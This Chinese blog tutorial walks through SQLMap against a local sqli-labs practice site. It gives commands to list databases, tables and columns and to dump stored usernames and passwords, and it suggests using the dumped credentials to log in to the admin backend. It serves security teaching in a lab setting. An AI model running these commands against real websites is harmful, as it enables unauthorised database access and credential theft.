网站首页 > 技术文章 正文
BY 马丁
一. SQLmap
SQLMap是一个自动化注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件。支持的数据库Mysql、Oracle、SQL Server等众多数据库。
二. 常见注入类型
ü 布尔类型盲注,即可以根据返回页面判断条件真假的注入
ü 基于时间的盲注,即不能根据返回页面的内容判断任何信息,要用条件语句查看时间的延迟语句是否已执行(页面返回时间的增加)来判断
ü 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中
ü 联合查询注入,在可以使用Union的情况下的注入
ü 堆查询注入,可以使用多条执行语句时的注入
三. 所用环境及工具
ü Python 2.7.8
ü SQLMap 1.4
ü Sqlilabs
四. 步骤
1. 安装SQLMap需要安装python环境(不支持python3),实验中使用到的环境是python 2.7.8。安装好了过后如下图。
2. 把SQLMap安装包放入python的安装目录下面,进入到SQLMap的目录。
3. 判断目标URL是否存在注入点。检测出注入点,便进一步查询数据库。
4. 查询当前用户下的所有数据库名称 sqlmap.py -u "
http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs
5. 查询当前使用的数据库 sqlmap.py -u "
http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-db 获取当前数据库的名称
6. 进而查询当前数据中的表 sqlmap.py -u "
http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security –tables
7. 知道了表过后,就可以来查询表中的字段了 sqlmap.py -u "
http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users –columns
8. 查询出了字段过后,就可以来查寻表中的数据了,也就是账号密码。得到帐户密码过后,可以寻找后台地址来尝试登陆。
sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C password,username –dump
五. SQL注入的防御
对客户端提交的代码进行严格的转义和过滤。
猜你喜欢
- 2025-07-27 Java从入门到放弃(2)搭建Java环境
- 2025-07-27 全网最完整的免费java教程讲义(一)——java配置和安装
- 2024-10-28 Linux系统中的Oracle数据备份(三)——重置sys和system密码
- 2024-10-28 一次Linux服务器沦陷为肉鸡的全过程实录
- 2024-10-28 Oracle暂停俄罗斯所有业务 oracle停服务
- 2024-10-28 Empower网络版工作站管理员学习笔记之五
你 发表评论:
欢迎- 最近发表
- 标签列表
-
- 前端设计模式 (75)
- 前端性能优化 (51)
- 前端模板 (66)
- 前端跨域 (52)
- 前端缓存 (63)
- 前端aes加密 (58)
- 前端脚手架 (56)
- 前端md5加密 (54)
- 前端路由 (61)
- 前端数组 (73)
- 前端js面试题 (50)
- 前端定时器 (59)
- Oracle RAC (76)
- oracle恢复 (77)
- oracle 删除表 (52)
- oracle 用户名 (80)
- oracle 工具 (55)
- oracle 内存 (55)
- oracle 导出表 (62)
- oracle约束 (54)
- oracle 中文 (51)
- oracle链接 (54)
- oracle的函数 (58)
- oracle面试 (55)
- 前端调试 (52)
本文暂时没有评论,来添加一个吧(●'◡'●)